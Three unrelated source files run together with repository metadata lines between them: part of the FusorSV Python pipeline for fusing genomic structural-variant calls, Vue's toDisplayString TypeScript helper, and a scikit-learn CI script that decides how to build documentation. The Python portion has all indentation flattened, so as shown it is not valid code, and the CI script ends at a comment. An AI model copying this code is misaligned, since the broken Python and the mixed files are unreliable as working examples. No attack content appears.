write_vcf_g1k = True #new default
write_model = True #new default
if args.k_fold is not None: cross_fold = args.k_fold
else: cross_fold = 1
if args.n_k is not None and cross_fold > 1: n_cross = args.n_k
else: n_cross = 1
if args.cpus is not None: cpus = args.cpus
else: cpus = 1
if args.bins is not None: beta = args.bins
else: beta = 16
if args.obs is not None: obs = args.obs
else: obs = 1000
if args.min_g is not None: min_g = args.min_g
else: min_g = 0.0
if args.over_m is not None: over_m = args.over_m
else: over_m = 1E-10 #1bp overlap in a human genome = 3E-9
if args.chroms is not None:
chroms = args.chroms.split(',')
else:
chroms = [str(i) for i in range(1,23)]+['X','Y','MT'] #limit to chroms of interest
if args.cluster_overlap is not None: cluster_overlap = args.cluster_overlap
else: cluster_overlap = 0.0
if args.lift_over is not None:
if args.lift_over.upper()=='DEFAULT': #need to do -L default to get default
lift_over = ru.get_local_path('liftover/hg19ToHg38.over.chain.gz') #default
else: lift_over = args.lift_over #lift over file for downstream analysis
else: lift_over = None
#load a user defined stage mapping id or use the one provided
if args.stage_map_json_file is not None:
callers= ru.get_stage_map(args.stage_map_json_file) #user can supply a seperate stage map
if callers == {}: #-1 is reserved for FusorSV and 0 for true
callers = ru.get_stage_map(ru.get_local_path('stage_map.json'))
else:
callers = ru.get_stage_map(ru.get_local_path('stage_map.json'))
stage_exclude_list = [1,13,36] #default exclude list
if args.stage_exclude_list is not None:
try:
stage_exclude_list = [int(i) for i in args.stage_exclude_list.rsplit(',')]
print('using stage id exclude list:%s'%stage_exclude_list)
except Exception as E:
print('error parsing comma seperated list, using defaults')
print('defaults stage exclude list is: %s'%stage_exclude_list)
#seperate merging out batched FusorSV call VCFs
vcf_glob = out_dir+'/vcf/*_S-1.vcf' #fusorSV VCFS only
if args.merge:
tst_str = 'FULL'
ref_seq = {'.'.join(ref_path.rsplit('/')[-1].rsplit('.')[0:-1]):ru.read_fasta(ref_path)}
print('cluster merging tool processing samples')
out_vcf = out_dir+'/vcf/all_samples_genotypes.'+tst_str+'.vcf'
print('completed = %s'%su.fusorSV_vcf_multi_sample_merge(vcf_glob,out_vcf,
ref_seq[ref_seq.keys()[0]],
overlap=cluster_overlap))
if lift_over is not None:
#now do a liftover to partition the calls with a possible new reference space
su.fusorSV_vcf_liftover_samples(out_dir+'/vcf/all_samples_genotypes*.vcf*',ref_path,lift_over) #default is on
n_stop = time.time()
print(''.join([':::' for i in range(40)]))
exit(0)
# -r -i -o -M 0.5 -L --merge
def get_observations(in_dir): #will look for .tar.gz file or glob the uncompressed folder
#this require refactoring out HTSeq for tar archive to gzip support
obs = []
return obs
result_list = [] #async queue to put results for || stages
def collect_results(result):
result_list.append(result)
#[1] File Partitioning------------------------------------------------------------------
#read and convert to SVULTB all SV caller VCF inputs
#saving each partition to a seperate pickle file || by sample << partition
def partition_call_sets(sample,k,O,R,B,chroms,flt,flt_exclude,caller_exclude):
sname = sample[sample.rfind('/')+1:] #extract sample identifier
print('reading sample %s'%sname)
sname_partition_path = out_dir+'/svul/'+sname #build path
S,V = su.vcf_glob_to_svultd(sample+'/*vcf',chroms,O,types=B.keys(),
vcf_flt=flt,flt_exclude=flt_exclude,
caller_exclude=caller_exclude)
S = su.filter_call_sets2(S,R,exclude=flt_exclude) #filter svmasks
Q = fusor.slice_samples([[sname,S]]) #legacy
P = fusor.partition_sliced_samples(Q,B,exclude=caller_exclude) #partition
success = fusor.write_partitions_by_sample(sname_partition_path,P) #write to disk
return [sname,success] #report back to async queue
#[1] File Partitioning------------------------------------------------------------------
#[2] Pool Partitions--------------------------------------------------------------------
#this is || by partition: t, b
def merge_partitions(callers,t,b):
partition_path = out_dir+'/svul/'
P = fusor.read_partitions_by_caller(partition_path,callers,t,b,False)
return [sname,P]
#[2] Pool Partitions--------------------------------------------------------------------
#[3a] Fit the Model Partition----------------------------------------------------------------------------
def prior_model_partition(snames,t,b,k,callers,caller_exclude,min_g,brkpt_smoothing):
print('starting model partition:\tt=%s\tb=%s'%(t,b))
start = time.time()
P = fusor.read_partitions_by_caller(out_dir+'/svul/',callers,caller_exclude,t,b,False)
#P,snames = fusor.pre_cluster_samples(P,r=0.9),['CLUSTER'] #optional preclustering
T = fusor.target_by_sample(P,k) #extract the partitioned target
J = fusor.all_samples_all_pairs_magnitudes(P,snames) #pool all feature magnitudes
K = fusor.all_samples_all_callers_bkpts(P,snames) #pool all breakpoints
D,NN = fusor.pooled_distance(J) #this is done inside the all_group_weights as well
W = fusor.all_group_weights(J,k,mode='j') #pooled D,NN and all group weights
E = fusor.select_groups(W,min_g) #gamma is a group selection cutoff
A = fusor.pileup_group_by_sample(P,E,(k,)) #now its just one partition here
if brkpt_smoothing:
print('optimizing model partition with brkpt smoothing:\tt=%s\tb=%s'%(t,b))
alpha = fusor.target_filter_cutoff_exhaustive_brkpt(A,P,T,E,K)
stop = time.time()
print('fusion model partition:\tt=%s\tb=%s\t%s sec\tcappa=%s'%(t,b,round(stop-start,2),alpha[t][b]))
else:
print('optimizing model partition:\tt=%s\tb=%s'%(t,b))
alpha = fusor.target_filter_cutoff_exhaustive(A,E,T) #optimal cutoff location
stop = time.time()
print('fusion model partition:\tt=%s\tb=%s\t%s sec\talpha=%s'%(t,b,round(stop-start,2),alpha[t][b]))
return [(t,b),J,D,E,alpha,K]
#[3a] Fit the Model Partition----------------------------------------------------------------------------
#[3b] Posterior Estimation Partition---------------------------------------------------------------------
def post_model_partition(apply_fusion_model_path,snames,t,b,k,callers,caller_exclude,min_g,smoothing):
start = time.time()
#[1] load prior model values----------------------------------------
B,J,D,E,alpha,n,K = fusor.import_fusion_model(apply_fusion_model_path) #import the existing model
if smoothing:
print('starting posterior estimate on partition:\tt=%s\tb=%s'%(t,b))
#[2] load new input data partitions
P = fusor.read_partitions_by_caller(out_dir+'/svul/',callers,caller_exclude,t,b,False) #all samples
J_new = fusor.all_samples_all_pairs_magnitudes(P,snames) #pool all feature magnitudes
#[3] construct the posterior estimator using: the prior data, new data and imputed true row==k
J_post = fusor.additive_magnitude_smoothing(J,J_new,k) #k is used to swap a row J_prime into J
D_post,NN_post = fusor.pooled_distance(J_post) #get the new data distance matrix
W_post = fusor.all_group_weights(J_post,k,mode='j') #calculate the pooled D,NN and all group weights
E_post = fusor.select_groups(W_post,min_g) #gamma is a group selection cutoff
alpha_post = fusor.post_filter_cutoff(E,E_post,alpha) #updated filter estimates
stop = time.time()
print('posterior estimate on partition:\tt=%s\tb=%s\t%s sec\talpha=%s'%(t,b,round(stop-start,2),
alpha_post[t][b]))
else:
print('using prior estimate on partition:\tt=%s\tb=%s'%(t,b))
J_post = {t:{b:J[t][b]}}
D_post = {t:{b:D[t][b]}}
E_post = {t:{b:E[t][b]}}
alpha_post = {t:{b:alpha[t][b]}}
K[t] = {t:{b:K[t][b]}}
stop = time.time()
print('prior estimate on partition:\tt=%s\tb=%s\t%s sec\talpha=%s' % (t,b,round(stop-start,2),
alpha_post[t][b]))
return [(t,b),J_post,D_post,E_post,alpha_post,K]
#[3b] Posterior Estimation Partition--------------------------------------------------------------------
#[4] Apply Model To Samples---------------------------------------------------------------------------------
#supports both single model training and posterior estimate via additive smoothing and diagnostics: mantel
def apply_model_to_samples(sample,ref_path,chroms,types,bins,callers,O,
model_path,apply_fusion_model_path,k,f_id,
over_m,r=0.5,smoothing=False,detail=False,verbose=False,IDX=6):
sname = sample[sample.rfind('/')+1:] #extract sample identifier
print('starting fusorSV discovery on sample %s'%sname)
ref_seq = {'.'.join(ref_path.rsplit('/')[-1].rsplit('.')[0:-1]):ru.read_fasta(ref_path)} #~3GB
hist,C = {},{}
cross_fold_stats,detailed_stats = {c:{} for c in callers},{} #each single caller
for t in types:
for c in cross_fold_stats:
if not t in cross_fold_stats[c]: cross_fold_stats[c][t] = []
B,J,J_post,D,D_post,alpha,alpha_post,K,n,n_post = {},{},{},{},{},{},{},{},0,0
#[1] apply the model here------------------------------------------------------------------------------
if apply_fusion_model_path is None:#:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
if verbose: print('loading base fusion model partitions for %s'%sname)
B,J,D,E,alpha,n,K = fusor.import_fusion_model(model_path) #import the base model
P = fusor.read_partitions_by_sample(partition_path,sname) #read all partitions for sname
Q = fusor.unpartition_sliced_samples(P) #unpartition for merging later
if verbose: print('projection of all call sets on %s'%sname)
A = fusor.pileup_group_by_sample(P,E,(k,)) #projection of all calls for a sample
F = fusor.filter_pileup_by_sample(A,alpha,leave_in=False) #filter using optimal cutof in the mode
if smoothing:
#now do breakpoint smoothing algorithm---------------------------------------------------------
F = fusor.best_smooth_brkpt_samples(F,K,P)
#now do breakpoint smoothing algorithm---------------------------------------------------------
fusor.merge_filtered_samples(Q,F,f_id,snames,[],over_m)
else:#:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
if verbose: print('loading base and posterior estimate partitions for %s'%sname)
B,J,D,E,alpha,n,K = fusor.import_fusion_model(apply_fusion_model_path) #import prior model
if smoothing:
B,J_post,D_post,E_post,alpha_post,n_post,K = fusor.import_fusion_model(model_path) #import new data
P = fusor.read_partitions_by_sample(partition_path,sname) #read all partitions for sname
Q = fusor.unpartition_sliced_samples(P) #unpartition for merging later
A = fusor.pileup_group_by_sample(P,E,(k,)) #projection of all calls for a sample
if smoothing:
F = fusor.filter_pileup_by_sample(A,alpha,E_post,leave_in=False) # filter cutoff in the mode
else:
F = fusor.filter_pileup_by_sample(A,alpha,E,leave_in=False) # filter cutoff in the mode
if smoothing:
#now do breakpoint smoothing algorithm---------------------------------------------------------
F = fusor.best_smooth_brkpt_samples(F,K,P)
#now do breakpoint smoothing algorithm---------------------------------------------------------
fusor.merge_filtered_samples(Q,F,f_id,snames,[],over_m) #expectation priorty merge back result
#[2] do some scoring and write out the sample results, returning for global performance----------------
start = time.time()
for t in Q: #give the metrics for each sample and write out the result
for c in set(cross_fold_stats).difference(set([f_id,k])):
if verbose: print('%s%s'%(callers[c],''.join(['-' for i in range(80)]))) #other callers first
cross_fold_stats[c][t] += [fusor.pretty_stats(Q,types,t,k,c,sname,r,verbose,smoothing)]
if verbose: print('fusorSV%s'%(''.join(['-' for i in range(80)]))) #then fusorSV
cross_fold_stats[f_id][t] += [fusor.pretty_stats(Q,types,t,k,f_id,sname,r,verbose,smoothing)]
C[t] = []
if Q[t].has_key(f_id) and Q[t][f_id].has_key(sname):
C[t] = Q[t][f_id][sname]
for i in cross_fold_stats[f_id][t][-1][6]:
C[t][i][IDX][k] = [-1] #flag the idx with the target key and -1
if verbose: print('writing VCF for %s'%sname)
G = su.svult_to_genome(C,O) #start conversion back to VCF
hist[sname] = su.genome_to_vcf(G,ref_seq,types,chroms,callers,
out_dir+'/vcf/'+sname+'_S'+str(f_id)+'.vcf',sname,target_key=k) #VCF
if detail:
for c in callers:
detailed_stats[c] = {}
for t in types:
detailed_stats[c][t] = {}
for i in range(len(B[t])-1):
detailed_stats[c][t][bins[t][i]] = []
for t in Q:
for c in set(detailed_stats.keys()).difference(set([f_id,k])): #do the other callers
if verbose: print('%s%s'%(callers[c],''.join(['-' for x in range(80)])))
T = fusor.pretty_bin_stats(Q,types,t,B,bins,k,c,sname,r,verbose,smoothing)
for i in range(len(B[t])-1):
detailed_stats[c][t][bins[t][i]] = [T[bins[t][i]]]
if verbose: print('fusorSV%s'%(''.join(['-' for i in range(80)])))
T = fusor.pretty_bin_stats(Q,types,t,B,bins,k,f_id,sname,r,verbose,smoothing) #no fusorSV
for i in range(len(B[t])-1):
detailed_stats[f_id][t][bins[t][i]] = [T[bins[t][i]]]
stop = time.time()
if verbose: print('scoring completed for %s in %s sec'%(sname,round(stop-start,2)))
return [sname,cross_fold_stats,hist,detailed_stats]
#[4] Apply Model To Samples--------------------------------------------------------------------------------
if __name__ == '__main__':
full_start = time.time()
if not os.path.exists(out_dir): os.makedirs(out_dir)
if not os.path.exists(out_dir+'/tigra_ctg_map/'): os.makedirs(out_dir+'/tigra_ctg_map/')
if not os.path.exists(out_dir+'/g1k/'): os.makedirs(out_dir+'/g1k/')
if not os.path.exists(out_dir+'/vcf/'): os.makedirs(out_dir+'/vcf/')
if not os.path.exists(out_dir+'/svul/'): os.makedirs(out_dir+'/svul/')
if not os.path.exists(out_dir+'/models/'): os.makedirs(out_dir+'/models/')
if not os.path.exists(out_dir+'/meta/'): os.makedirs(out_dir+'/meta/')
if not os.path.exists(out_dir+'/visual/'): os.makedirs(out_dir+'/visual/')
if not os.path.exists(out_dir+'/visual/bed/'): os.makedirs(out_dir+'/visual/bed/')
files = glob.glob(in_dir+'*') #get all sample directories
#entry here for correcting files from a .tar.gz
samples,snames = [],[]
for i in files:
sname = i.rsplit('/')[-1]
samples += [i]
snames += [i.rsplit('/')[-1]]
#snames,samples = snames[0:2],samples[0:2] #testing line
print('processing samples %s\n for chroms %s'%(samples,chroms))
coordinate_offset_json = ref_path.rsplit('/')[-1].rsplit('.fa')[0]+'_coordinates.json'
if not os.path.isfile(out_dir+'/meta/'+coordinate_offset_json):
print('making a new coordinate offset json file')
ru.write_coordinate_offsets(ref_path,out_dir+'/meta/'+coordinate_offset_json)
O = ru.get_coordinate_offsets(out_dir+'/meta/'+coordinate_offset_json) #must have a valid offset map
R = [] #human callers work better with svmask
if args.sv_mask is not None: #None if no mask desired
if args.sv_mask.endswith('.bed'):
sv_mask_json = args.sv_mask.rsplit('/')[-1].rsplit('.bed')[0]+'_svmask.json'
if not os.path.exists(out_dir+'/meta/'+sv_mask_json):
ru.bed_mask_to_json_mask(args.sv_mask,out_dir+'/meta/'+sv_mask_json)
elif args.sv_mask.endswith('.json'):
ru.copy_json_mask(args.sv_mask,out_dir+'/meta/'+args.sv_mask.rsplit('/')[-1])
#mask these regions------------------------------------------------------------------------------------
R += ru.get_mask_regions(out_dir+'/meta/'+sv_mask_json,O) #svmask from ref complexity
print('merging the svmask regions')
start = time.time()
R = ru.flatten_mask_regions(R,O,complement=False) #single IRanges
stop = time.time()
print('svmask regions merged in %s sec'%(round(stop-start,2)))
#mask these regions------------------------------------------------------------------------------------
k,flt,f_id,m_id = 0,0,-1,1 #k=true_id,flt=filter 0 is .,PASS,f_id=fusorSV_id,m_id=metaSV_id
exclude_callers = stage_exclude_list #exclude caller options put any id here to exclude
B = {t:[1,100,250,500,1000,5000,10000,50000,100000,1000000] for t in range(0,8)}
# B = fusor.distribute_bins(Q,k,n_b=beta,m_b=obs,lower=None,upper=None,event=False) #equal power distribution
B[1] = [1,50,100,1000,1000000]
B[2] = [1,50,100,400,600,950,1250,1550,1950,2250,2950,3650,4800,6150,9000,18500,100000,1000000]
#B[2] = [1,50,100,400,600,950,1250,1550,1950,2250,2950,3650,4800,6150,9000,18500,100000,10000000]
B[3] = [1,50,1000,10000,50000,100000,250000,500000,1000000]
#B[3] = [1,50,500,1000,5000,10000,50000,250000,10000000]
B[5] = [1,50,2500,3500,45000,80000,115000,180000,260000,300000,375000,500000]
#B[5] = [1,50,100,250,500,1000,2500,3500,45000,80000,115000,180000,260000,300000,500000,1000000]
types = {0:'SUB',1:'INS',2:'DEL',3:'DUP',4:'CNV',5:'INV',6:'TRA',7:'BND'}
bins = {t:su.pretty_ranges(B[t],'') for t in B}
partition_path = out_dir+'/svul/'
total_partitions = len(glob.glob(partition_path+'*.pickle.gz'))
#entry for testing-------------------------------------
# c = fusor.check_sample_full(samples,-2,-3,O,R,chroms,types=[2,3,5],flt=0,r=0.9,self_merge=True)
#entry for testing------------------------------------
#||||||||||||||||||||||||||||||||||||||BY SAMPLE|||||||||||||||||||||||||||||||||||||||||||||
#[1] read, parse, structure, select, partition and write out data for each sample if not done
snames_svuls = {}
written_svuls = glob.glob(partition_path+'*.pickle.gz')
for svul in written_svuls:
sname = svul.rsplit('/')[-1].rsplit('_')[0]
if snames_svuls.has_key(sname): snames_svuls[sname] += 1
else: snames_svuls[sname] = 1
if total_partitions<1 or len(set(snames).difference(set(snames_svuls.keys())))>1:
print('reading, parsing, partitioning and writing sample VCFs')
start = time.time()
p1 = mp.Pool(processes=cpus)
for sample in samples:
p1.apply_async(partition_call_sets,
args=(sample,k,O,R,B,chroms,flt,[],exclude_callers),
callback=collect_results)
time.sleep(0.25)
p1.close()
p1.join()
L = []
for i in result_list:
if i is not None: L+=[i]
result_list = []
gc.collect()
snames = [i[0] for i in L] #passing list of sample names
#only have to read in the samples once
stop = time.time()
total_partitions = len(glob.glob(partition_path+'*.pickle.gz'))
print('finished reading %s out of %s samples generating %s partitions in %s sec'%\
(len(snames),len(samples),total_partitions,round(stop-start,2)))
#||||||||||||||||||||||||||||||||||||||BY SAMPLE|||||||||||||||||||||||||||||||||||||||||||||
if n_cross>1 and cross_fold>1: #for each run will permute using the k_fold divisor to partition
print('employing crossfold validation measures...runs=%s\tkfold=%s'%(n_cross,cross_fold))
for n_k in range(n_cross): #default is 1 and cross_fold = 0
n_start = time.time()
tst_ids = []
if cross_fold>1:
tst_ids = sorted(list(np.random.choice(range(len(samples)),len(samples)/cross_fold,replace=False)))
trn_ids = sorted(list(set(range(len(samples))).difference(set(tst_ids))))
tst_str = ''.join([hex(i)[2:].upper() for i in tst_ids]) #get a id sorted hex string of the ids used
trn_str = ''.join([hex(i)[2:].upper() for i in trn_ids]) #get a id sorted hex string of the ids used
if len(tst_str)>10: tst_str = str(hash(tst_str))
if len(trn_str)>10: trn_str = str(hash(trn_str))
#||||||||||||||||||||||||||||||||||||||BY PARTITION||||||||||||||||||||||||||||||||||||||||||
#[2]train or apply the model
#load the data and build a model if one isn't already available in ||
if apply_fusion_model_path is None: #train a new model assuming k_fold=0 here
model_path = out_dir+'/models/'+'.'.join(ref_path.rsplit('/')[-1].rsplit('.')[0:-1])+\
'.'+in_dir[0:-1].rsplit('/')[-1]+trn_str+'.pickle.gz'
if not os.path.exists(model_path): #write a model if it hasn't been done yet
start = time.time() #now in || for faster performance and less RAM
p1 = mp.Pool(processes=cpus)
for t in types:
for b in range(len(B[t])-1):
p1.apply_async(prior_model_partition,
args=([snames[i] for i in trn_ids],t,b,k,
callers,exclude_callers,min_g,False),
callback=collect_results)
time.sleep(0.5)
p1.close()
p1.join()
L = []
for i in result_list:
if i is not None: L+=[i]
result_list = []
gc.collect()
stop = time.time()
print('finished modeling in %s sec'%round(stop-start,2))
J,D,E,alpha,n,K = fusor.assemble_model(L)
fusor.export_fusion_model(B,J,D,E,alpha,len(snames),K,model_path)
L = []
gc.collect()
else: #can clip this one the || sample application is completed
B,J,D,E,alpha,n,K = fusor.import_fusion_model(model_path)
else: #apply an existing model and then use additive smoothing with the all new input data
B,J,D,E,alpha,n,K = fusor.import_fusion_model(apply_fusion_model_path)
model_path = out_dir+'/models/'+'.'.join(ref_path.rsplit('/')[-1].rsplit('.')[0:-1])+\
'.'+in_dir[0:-1].rsplit('/')[-1]+trn_str+'.post.pickle.gz'
#now look at the new data and make a model for it, minus the true (estimate it)
if not os.path.exists(model_path) and args.smoothing: #write a model if it hasn't been done yet
start = time.time() #now in || for faster performance and less RAM
p1 = mp.Pool(processes=cpus)
for t in types:
for b in range(len(B[t])-1):
p1.apply_async(post_model_partition,
args=(apply_fusion_model_path,snames,t,b,k,
callers,exclude_callers,min_g,
args.smoothing),
callback=collect_results)
time.sleep(0.5)
p1.close()
p1.join()
L = []
for i in result_list:
if i is not None: L+=[i]
result_list = []
gc.collect()
stop = time.time()
print('finished estimation in %s sec'%round(stop-start,2))
J_post,D_post,E_post,alpha_post,n_post,K = fusor.assemble_model(L,args.smoothing)
fusor.export_fusion_model(B,J_post,D_post,E_post,alpha_post,len(snames),K,model_path)
L = []
gc.collect()
else: #can clip this one the || sample application is completed
B,J_post,D_post,E_post,alpha_post,n_post,K = fusor.import_fusion_model(apply_fusion_model_path)
#||||||||||||||||||||||||||||||||||||||BY PARTITION||||||||||||||||||||||||||||||||||||||||||
#||||||||||||||||||||||||||||||||||||||BY SAMPLE|||||||||||||||||||||||||||||||||||||||||||||
print('apply fusion model to sample inputs and generating fusorSV ouput')
if n_cross>1 and cross_fold>1:
print('scoring the crossfold run %s out of...runs=%s\tkfold=%s'%(n_k,n_cross,cross_fold))
else:
tst_ids,tst_str = trn_ids,trn_str
start = time.time()
p1 = mp.Pool(processes=max(1,cpus/2))
for sample in [samples[i] for i in tst_ids]:
p1.apply_async(apply_model_to_samples,
args=(sample,ref_path,chroms,types,bins,callers,O,
model_path,apply_fusion_model_path,k,f_id,
over_m,0.5,args.smoothing,args.detail,args.detail,6),
callback=collect_results)
time.sleep(0.5)
p1.close()
p1.join()
L = []
for i in result_list:
if i is not None: L+=[i]
result_list = []
gc.collect()
#only have to read in the samples once
stop = time.time()
print('finished reading samples in %s sec'%round(stop-start,2))
#||||||||||||||||||||||||||||||||||||||BY SAMPLE|||||||||||||||||||||||||||||||||||||||||||||
cross_fold_stats,hist,detailed_stats = fusor.assemble_stats(L)
ref_seq = {'.'.join(ref_path.rsplit('/')[-1].rsplit('.')[0:-1]):ru.read_fasta(ref_path)}
#compute cross_fold averages
if apply_fusion_model_path is None:
for c in cross_fold_stats:
print('%s--------------------------------------------------------------'%callers[c])
for t in cross_fold_stats[c]:
if len(cross_fold_stats[c][t])>0:#have all samples here to plot/look at!
#idea[1] look at scatterplot with a line
prec = round(np.mean([i[2] for i in cross_fold_stats[c][t]]),2)
rec = round(np.mean([i[3] for i in cross_fold_stats[c][t]]),2)
f1 = round(np.mean([i[4] for i in cross_fold_stats[c][t]]),2)
j = round(np.mean([i[5] for i in cross_fold_stats[c][t]]),2)
n = round(np.mean([i[7] for i in cross_fold_stats[c][t]]),2)
m = round(np.mean([i[8] for i in cross_fold_stats[c][t]]),2)
l_mu = round(np.mean([i[9] for i in cross_fold_stats[c][t]]),2)
r_mu = round(np.mean([i[10] for i in cross_fold_stats[c][t]]),2)
print('average for t=%s\tprec=%s\trec=%s\tf1=%s\tj=%s\tn=%s\tm=%s\tl_mu=%s\tr_mu=%s'%\
(types[t],prec,rec,f1,j,n,m,l_mu,r_mu))
#CHECK-SCORES-----------------------------------------------------------------------------------------------
fusor.export_caller_performance(cross_fold_stats,callers,
out_dir+'/visual/cross_fold_stats.'+tst_str+'.tsv')
fusor.export_detailed_performance(detailed_stats,callers,
out_dir+'/visual/detailed_stats.'+tst_str+'.tsv')
fusor.export_caller_by_type_and_bin(E,alpha,callers,types,bins,
out_dir+'/visual/callers_tbj.'+tst_str+'.tsv')
fusor.export_distance_matrix(D,callers,types,bins,
out_dir+'/visual/sim_matrix.'+tst_str+'.tsv',sim=True)
#(a) check for an Rscript engine
#(b) use the command parser to fire up the Rscript and check
#(c) for the drawing libraries to ggplot, ect to use
#-------------------------------------------------------------------
vcf_glob = out_dir+'/vcf/*_S-1.vcf' #fusorSV VCFS only
if not args.no_merge:
if cluster_overlap > 0.0:
print('cluster merging tool processing samples')
out_vcf = out_dir+'/vcf/all_samples_genotypes.'+tst_str+'.vcf'
print('completed = %s'%su.fusorSV_vcf_multi_sample_merge(vcf_glob,out_vcf,
ref_seq[ref_seq.keys()[0]],
overlap=cluster_overlap))
if lift_over is not None:
#now do a liftover to partition the calls with a possible new reference space
su.fusorSV_vcf_liftover_samples(out_dir+'/vcf/all_samples_genotypes*.vcf*',ref_path,lift_over) #default is on
if n_cross>1 and cross_fold>1 and not args.clean: #can clean up the VCF and model files...
print('cleaning interim data for run %s out of...runs=%s\tkfold=%s'%(n_k, n_cross,cross_fold))
os.remove(model_path)
for vcf in glob.glob(vcf_glob): os.remove(vcf)
n_stop = time.time()
print('run %s in %s sec'%(n_k,round(n_stop-n_start,2)))
print(''.join([':::' for i in range(40)]))
|
unknown
|
codeparrot/codeparrot-clean
| ||
// enums are compiled away via custom transform so no real dependency here
import { ReactiveFlags } from '@vue/reactivity'
import {
isArray,
isFunction,
isMap,
isObject,
isPlainObject,
isSet,
isString,
isSymbol,
objectToString,
} from './general'
// can't use isRef here since @vue/shared has no deps
const isRef = (val: any): val is { value: unknown } => {
return !!(val && val[ReactiveFlags.IS_REF] === true)
}
/**
* For converting {{ interpolation }} values to displayed strings.
* @private
*/
export const toDisplayString = (val: unknown): string => {
return isString(val)
? val
: val == null
? ''
: isArray(val) ||
(isObject(val) &&
(val.toString === objectToString || !isFunction(val.toString)))
? isRef(val)
? toDisplayString(val.value)
: JSON.stringify(val, replacer, 2)
: String(val)
}
const replacer = (_key: string, val: unknown): any => {
if (isRef(val)) {
return replacer(_key, val.value)
} else if (isMap(val)) {
return {
[`Map(${val.size})`]: [...val.entries()].reduce(
(entries, [key, val], i) => {
entries[stringifySymbol(key, i) + ' =>'] = val
return entries
},
{} as Record<string, any>,
),
}
} else if (isSet(val)) {
return {
[`Set(${val.size})`]: [...val.values()].map(v => stringifySymbol(v)),
}
} else if (isSymbol(val)) {
return stringifySymbol(val)
} else if (isObject(val) && !isArray(val) && !isPlainObject(val)) {
// native elements
return String(val)
}
return val
}
const stringifySymbol = (v: unknown, i: number | string = ''): any =>
// Symbol.description in es2019+ so we need to cast here to pass
// the lib: es2016 check
isSymbol(v) ? `Symbol(${(v as any).description ?? i})` : v
|
typescript
|
github
|
https://github.com/vuejs/core
|
packages/shared/src/toDisplayString.ts
|
#!/usr/bin/env bash
set -e
set -x
# Decide what kind of documentation build to run, and run it.
#
# If the last commit message has a "[doc skip]" marker, do not build
# the doc. On the contrary if a "[doc build]" marker is found, build the doc
# instead of relying on the subsequent rules.
#
# We always build the documentation for jobs that are not related to a specific
# PR (e.g. a merge to main or a maintenance branch).
#
# If this is a PR, do a full build if there are some files in this PR that are
# under the "doc/" or "examples/" folders, otherwise perform a quick build.
#
# If the inspection of the current commit fails for any reason, the default
# behavior is to quick build the documentation.
# defines the get_dep and show_installed_libraries functions
source build_tools/shared.sh
if [ -n "$GITHUB_ACTION" ]
then
# Map the variables from Github Action to CircleCI
CIRCLE_SHA1=$(git log -1 --pretty=format:%H)
CIRCLE_JOB=$GITHUB_JOB
if [ "$GITHUB_EVENT_NAME" == "pull_request" ]
then
CIRCLE_BRANCH=$GITHUB_HEAD_REF
CI_PULL_REQUEST=true
CI_TARGET_BRANCH=$GITHUB_BASE_REF
else
CIRCLE_BRANCH=$GITHUB_REF_NAME
fi
fi
if [[ -n "$CI_PULL_REQUEST" && -z "$CI_TARGET_BRANCH" ]]
then
# Get the target branch name when using CircleCI
CI_TARGET_BRANCH=$(curl -s "https://api.github.com/repos/scikit-learn/scikit-learn/pulls/$CIRCLE_PR_NUMBER" | jq -r .base.ref)
fi
get_build_type() {
if [ -z "$CIRCLE_SHA1" ]
then
echo SKIP: undefined CIRCLE_SHA1
return
fi
commit_msg=$(git log --format=%B -n 1 $CIRCLE_SHA1)
if [ -z "$commit_msg" ]
then
echo QUICK BUILD: failed to inspect commit $CIRCLE_SHA1
return
fi
if [[ "$commit_msg" =~ \[doc\ skip\] ]]
then
echo SKIP: [doc skip] marker found
return
fi
if [[ "$commit_msg" =~ \[doc\ quick\] ]]
then
echo QUICK: [doc quick] marker found
return
fi
if [[ "$commit_msg" =~ \[doc\ build\] ]]
then
echo BUILD: [doc build] marker found
return
fi
if [ -z "$CI_PULL_REQUEST" ]
then
echo BUILD: not a pull request
return
fi
git_range="origin/main...$CIRCLE_SHA1"
git fetch origin main >&2 || (echo QUICK BUILD: failed to get changed filenames for $git_range; return)
filenames=$(git diff --name-only $git_range)
if [ -z "$filenames" ]
then
echo QUICK BUILD: no changed filenames for $git_range
return
fi
changed_examples=$(echo "$filenames" | grep -E "^examples/(.*/)*plot_")
# The following is used to extract the list of filenames of example python
# files that sphinx-gallery needs to run to generate png files used as
# figures or images in the .rst files from the documentation.
# If the contributor changes a .rst file in a PR we need to run all
# the examples mentioned in that file to get sphinx build the
# documentation without generating spurious warnings related to missing
# png files.
if [[ -n "$filenames" ]]
then
# get rst files
rst_files="$(echo "$filenames" | grep -E "rst$")"
# get lines with figure or images
img_fig_lines="$(echo "$rst_files" | xargs grep -shE "(figure|image)::")"
# get only auto_examples
auto_example_files="$(echo "$img_fig_lines" | grep auto_examples | awk -F "/" '{print $NF}')"
# remove "sphx_glr_" from path and accept replace _(\d\d\d|thumb).png with .py
scripts_names="$(echo "$auto_example_files" | sed 's/sphx_glr_//' | sed -E 's/_([[:digit:]][[:digit:]][[:digit:]]|thumb).png/.py/')"
# get unique values
examples_in_rst="$(echo "$scripts_names" | uniq )"
fi
# executed only if there are examples in the modified rst files
if [[ -n "$examples_in_rst" ]]
then
if [[ -n "$changed_examples" ]]
then
changed_examples="$changed_examples|$examples_in_rst"
else
changed_examples="$examples_in_rst"
fi
fi
if [[ -n "$changed_examples" ]]
then
echo BUILD: detected examples/ filename modified in $git_range: $changed_examples
pattern=$(echo "$changed_examples" | paste -sd '|')
# pattern for examples to run is the last line of output
echo "$pattern"
return
fi
echo QUICK BUILD: no examples/ filename modified in $git_range:
echo "$filenames"
}
build_type=$(get_build_type)
if [[ "$build_type" =~ ^SKIP ]]
then
exit 0
fi
if [[ "$CIRCLE_BRANCH" =~ ^main$|^[0-9]+\.[0-9]+\.X$ && -z "$CI_PULL_REQUEST" ]]
then
# ZIP linked into HTML
make_args=dist
elif [[ "$build_type" =~ ^QUICK ]]
then
make_args=html-noplot
elif [[ "$build_type" =~ ^'BUILD: detected examples' ]]
then
# pattern for examples to run is the last line of output
pattern=$(echo "$build_type" | tail -n 1)
make_args="html EXAMPLES_PATTERN=$pattern"
else
make_args=html
fi
# Installing required system packages to support the rendering of math
# notation in the HTML documentation and to optimize the image files
sudo -E apt-get -yq update --allow-releaseinfo-change
sudo -E apt-get -yq --no-install-suggests --no-install-recommends \
install dvipng gsfonts ccache zip optipng
# deactivate circleci virtualenv and setup a conda env instead
if [[ `type -t deactivate` ]]; then
deactivate
fi
# Install Miniforge
